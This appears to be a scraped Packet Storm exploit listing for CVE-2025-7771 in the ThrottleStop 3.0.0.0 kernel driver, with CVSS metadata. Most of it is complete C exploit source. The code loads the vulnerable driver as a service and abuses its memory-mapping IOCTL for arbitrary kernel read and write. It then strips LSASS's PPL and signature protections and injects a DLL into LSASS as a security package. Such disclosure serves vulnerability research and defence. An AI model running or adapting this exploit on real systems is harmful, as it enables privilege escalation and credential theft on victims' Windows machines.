{“lastseen”:”2026-04-22T16:28:36″,”description”:”Throttlestop Kernel Driver version 3.0.0.0 suffers from a privilege escalation vulnerability…”,”published”:”2026-04-22T00:00:00″,”modified”:”2026-04-22T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Throttlestop Kernel Driver 3.0.0.0 Privilege Escalation”,”source”:””,”references”:””,”id”:”PACKETSTORM:219544″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-7771″],”sourceData”:”# Exploit Title: Throttlestop Kernel Driver – Kernel Out-of-Bounds Write Privilege Escalation \\n # Exploit Details: https:\/\/xavibel.com\/2025\/12\/22\/using-vulnerable-drivers-in-red-team-exercises\/\\n # Date: 8\/12\/2025\\n # Exploit Author: Xavi Beltran\\n # Vendor Homepage: https:\/\/www.techpowerup.com\/download\/techpowerup-throttlestop\/\\n # Version: 3.0.0.0\\n # Tested on: Windows 11\\n # CVE-2025-7771\\n \\n #define WIN32_NO_STATUS\\n #define SECURITY_WIN32\\n #include \\u003cWindows.h\\u003e\\n #include \\u003cPsapi.h\\u003e\\n #include \\u003csuperfetch\/superfetch.h\\u003e\\n #include \\u003ctlhelp32.h\\u003e\\n #include \\u003cstring\\u003e\\n #include \\u003csspi.h\\u003e\\n \\n # define IOCTL_MMMAPIOSPACE 0x8000645C\\n #pragma comment(lib, \\”Secur32.lib\\”)\\n \\n #pragma pack(push,1)\\n typedef struct {\\n ULONGLONG PhysicalAddress; \/\/ +0\\n DWORD NumberOfBytes; \/\/ +8\\n } PHYS_REQ; \/\/ 0x0C\\n #pragma pack(pop)\\n \\n \/\/ Struct needed to call nt!NtQueryIntervalProfile\\n typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(IN ULONG ProfileSource, OUT PULONG Interval);\\n \\n LPVOID GetBaseAddr(LPCWSTR drvname)\\n {\\n LPVOID drivers[1024];\\n DWORD cbNeeded;\\n int nDrivers, i = 0;\\n if (EnumDeviceDrivers(drivers, sizeof(drivers), \\u0026cbNeeded) \\u0026\\u0026 cbNeeded \\u003c sizeof(drivers))\\n {\\n WCHAR szDrivers[1024];\\n nDrivers = cbNeeded \/ sizeof(drivers[0]);\\n for (i = 0; i \\u003c nDrivers; i++)\\n {\\n if (GetDeviceDriverBaseName(drivers[i], szDrivers, sizeof(szDrivers) \/ sizeof(szDrivers[0])))\\n {\\n if (wcscmp(szDrivers, drvname) == 0)\\n {\\n return drivers[i];\\n }\\n }\\n }\\n }\\n return 0;\\n }\\n \\n uint64_t xRead(HANDLE hDrv, uint64_t virt_addr) {\\n auto mm = spf::memory_map::current();\\n if (!mm) {\\n printf(\\”[!] Superfetch init failed!\\\\n\\”);\\n return 0;\\n }\\n \\n auto phys = mm-\\u003etranslate((void*)virt_addr);\\n if (!phys) {\\n printf(\\”[!] Translate failed for VA %p!\\\\n\\”, (void*)virt_addr);\\n return 0;\\n }\\n \\n \/\/printf(\\”[+] Virtual Adress=0x%016llx -\\u003e Physical Address 0x%016llx\\\\n\\”, virt_addr, phys);\\n \/\/ — PHYSICAL READ —\\n PHYS_REQ in{};\\n in.PhysicalAddress = phys;\\n in.NumberOfBytes = 0x8;\\n ULONGLONG out = 0;\\n DWORD br = 0;\\n BOOL ok = DeviceIoControl(hDrv,\\n IOCTL_MMMAPIOSPACE,\\n \\u0026in, sizeof(in), \/\/ 0x0C\\n \\u0026out, sizeof(out), \/\/ Accepts 4 or 8\\n \\u0026br, nullptr);\\n \\n \/\/printf(\\”[+] IOCTL OK=%d, br=%lu, err=%lu, Mapped Memory Ptr=0x%llx\\\\n\\”, ok, br, GetLastError(), (unsigned long long)out);\\n if (ok \\u0026\\u0026 br == 8 \\u0026\\u0026 out) {\\n ULONGLONG result = *(volatile ULONGLONG*)(uintptr_t)out; \/\/ 8 bytes exactos\\n printf(\\”[+] READ WHERE: 0x%016llx | CONTENT: 0x%016llx\\\\n\\”, (unsigned long long)virt_addr, (unsigned long long)result);\\n return result;\\n }\\n \\n return -1;\\n }\\n \\n uint64_t xWrite(HANDLE hDrv, uint64_t where, uint64_t what) {\\n auto mm = spf::memory_map::current();\\n if (!mm) {\\n printf(\\”[!] Superfetch init failed!\\\\n\\”);\\n return 0;\\n }\\n \\n auto phys = mm-\\u003etranslate((void*)where);\\n if (!phys) {\\n printf(\\”[!] Translate failed for VA %p!\\\\n\\”, (void*)where);\\n return 0;\\n }\\n \\n \/\/printf(\\”[+] Virtual Adress=0x%016llx -\\u003e Physical Address 0x%016llx\\\\n\\”, where, phys);\\n PHYS_REQ in{};\\n in.PhysicalAddress = phys;\\n in.NumberOfBytes = 0x8;\\n ULONGLONG out = 0;\\n DWORD br = 0;\\n BOOL ok = DeviceIoControl(hDrv,\\n IOCTL_MMMAPIOSPACE,\\n \\u0026in, sizeof(in), \/\/ 0x0C\\n \\u0026out, sizeof(out), \/\/ 8 (Accepts 4 or 8)\\n \\u0026br, nullptr);\\n \\n \/\/printf(\\”[+] IOCTL OK=%d, br=%lu, err=%lu, Mapped Memory Ptr=0x%llx\\\\n\\”, ok, br, GetLastError(), (unsigned long long)out);\\n if (ok \\u0026\\u0026 br == 8 \\u0026\\u0026 out) {\\n ULONGLONG result = *(volatile ULONGLONG*)(uintptr_t)out; \/\/ 8 bytes exactos\\n }\\n \\n \/\/ WRITE\\n printf(\\”[+] WRITE WHAT: 0x%016llx | WHERE: 0x%016llx\\\\n\\”, (unsigned long long)what, (unsigned long long)where);\\n *(uint64_t*)out = what;\\n return 0;\\n }\\n \\n DWORD FindProcessId(const std::wstring\\u0026 processName) {\\n DWORD processId = 0;\\n HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\\n if (snapshot == INVALID_HANDLE_VALUE)\\n return 0;\\n \\n PROCESSENTRY32W entry;\\n entry.dwSize = sizeof(PROCESSENTRY32W);\\n \\n if (Process32FirstW(snapshot, \\u0026entry)) {\\n do {\\n if (!_wcsicmp(entry.szExeFile, processName.c_str())) {\\n processId = entry.th32ProcessID;\\n break;\\n }\\n } while (Process32NextW(snapshot, \\u0026entry));\\n }\\n \\n CloseHandle(snapshot);\\n return processId;\\n }\\n \\n \\n int main()\\n {\\n DWORD lsassPid = FindProcessId(L\\”lsass.exe\\”);\\n printf(\\”[+] Target process PID: %d\\\\n\\”, lsassPid);\\n \/\/Installing the service\\n \\n SC_HANDLE hSCManager;\\n SC_HANDLE hService;\\n \\n \/\/ Open the Service Control Manager\\n hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE);\\n if (hSCManager == NULL) {\\n printf(\\”[!] Error opening SCM: %lu\\\\n\\”, GetLastError());\\n return 1;\\n }\\n \\n \/\/ Create the service\\n hService = CreateService(\\n hSCManager, \\n L\\”ThrottleStop\\”, \\n L\\”ThrottleStop\\”, \\n SERVICE_ALL_ACCESS, \\n SERVICE_KERNEL_DRIVER, \\n SERVICE_AUTO_START, \\n SERVICE_ERROR_NORMAL, \\n L\\”C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\a.sys\\”,\\n NULL, NULL, NULL, NULL, NULL);\\n \\n if (hService == NULL) {\\n printf(\\”[+] Error creating service: %lu\\\\n\\”, GetLastError());\\n CloseServiceHandle(hSCManager);\\n \/\/return 1;\\n }\\n \\n printf(\\”[!] Service created successfully.\\\\n\\”);\\n \\n if (!StartService(hService, 0, NULL)) {\\n printf(\\”[!] Error starting the service: %lu\\\\n\\”, GetLastError());\\n }\\n else {\\n printf(\\”[+] Service started correctly.\\\\n\\”);\\n }\\n \\n LPVOID nt_base = GetBaseAddr(L\\”ntoskrnl.exe\\”);\\n printf(\\”[+] NT base: %p\\\\n\\”, nt_base);\\n \\n HANDLE hDrv = NULL;\\n hDrv = CreateFileA(\\”\\\\\\\\\\\\\\\\.\\\\\\\\ThrottleStop\\”,\\n (GENERIC_READ | GENERIC_WRITE),\\n 0x00,\\n NULL,\\n OPEN_EXISTING,\\n FILE_ATTRIBUTE_NORMAL,\\n NULL);\\n \\n if (hDrv == INVALID_HANDLE_VALUE)\\n {\\n printf(\\”[-] Failed to get a handle on driver!\\\\n\\”);\\n return -1;\\n }\\n else {\\n printf(\\”[+] Handle on driver received!\\\\n\\”);\\n }\\n \\n ULONGLONG result = 0x0;\\n \\n \/\/ nt!PsInitialSystemProcess nt + 0x5412e0\\n ULONGLONG system_eprocess = ULONGLONG(nt_base) + 0x5412e0;\\n \\n DWORD64 Eprocess = xRead(hDrv, (uint64_t)system_eprocess);\\n printf(\\”[+] EPROCESS: 0x%llX\\\\n\\”, Eprocess);\\n DWORD64 CurrentProcessPid = xRead(hDrv, (uint64_t)system_eprocess + 0x2e0); \/\/ +0x2e0 UniqueProcessId : Ptr64 Void\\n \\n DWORD64 SearchProcessPid = 0;\\n DWORD64 searchEprocess = Eprocess;\\n while (1)\\n {\\n searchEprocess = xRead(hDrv, (uint64_t)searchEprocess + 0x2e8) – 0x2e8; \/\/ +0x2e8 ActiveProcessLinks : _LIST_ENTRY\\n SearchProcessPid = xRead(hDrv, (uint64_t)searchEprocess + 0x2e0); \/\/ +0x2e0 UniqueProcessId : Ptr64 Void\\n if (SearchProcessPid == lsassPid) \/\/ LSASS PROCESS\\n {\\n break;\\n }\\n }\\n \\n printf(\\”[+] Found LSASS EPROCESS!\\\\n\\”);\\n printf(\\”[+] Removing PPL Protection…\\\\n\\”);\\n xWrite(hDrv, (uint64_t)searchEprocess + 0x6ca, 0x0); \/\/ +0x6ca Protection : _PS_PROTECTION\\n printf(\\”[+] Removing Signature Level Protection…\\\\n\\”);\\n xWrite(hDrv, (uint64_t)searchEprocess + 0x6c8, 0x0);\/\/ +0x6c8 Protection : SignatureLevel : UChar\\n printf(\\”[+] LSASS protections disabled\\\\n\\”);\\n CloseHandle(hDrv);\\n \\n SECURITY_PACKAGE_OPTIONS spo = {};\\n SECURITY_STATUS ss = AddSecurityPackageA((LPSTR)\\”c:\\\\\\\\windows\\\\\\\\system32\\\\\\\\ntssp.dll\\”, \\u0026spo);\\n printf(\\”[+] DLL Injection successful!\\\\n\\”);\\n \\n return 0;\\n }”,”sourceHref”:”https:\/\/packetstorm.news\/download\/219544″,”cvss”:{“score”:8.7,”severity”:”HIGH”,”vector”:”CVSS:4.0\/AV:L\/AC:H\/AT:N\/PR:H\/UI:N\/VC:H\/SC:H\/VI:H\/SI:H\/VA:H\/SA:H”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/219544\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-22T16:28:36″,”description”:”Throttlestop Kernel Driver version 3.0.0.0 suffers from a privilege escalation vulnerability…”,”published”:”2026-04-22T00:00:00″,”modified”:”2026-04-22T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Throttlestop Kernel Driver 3.0.0.0 Privilege Escalation”,”source”:””,”references”:””,”id”:”PACKETSTORM:219544″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-7771″],”sourceData”:”# Exploit Title: Throttlestop Kernel Driver – Kernel Out-of-Bounds…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,19,12,15,13,53,7,11,5],"class_list":["post-48740","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-87","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n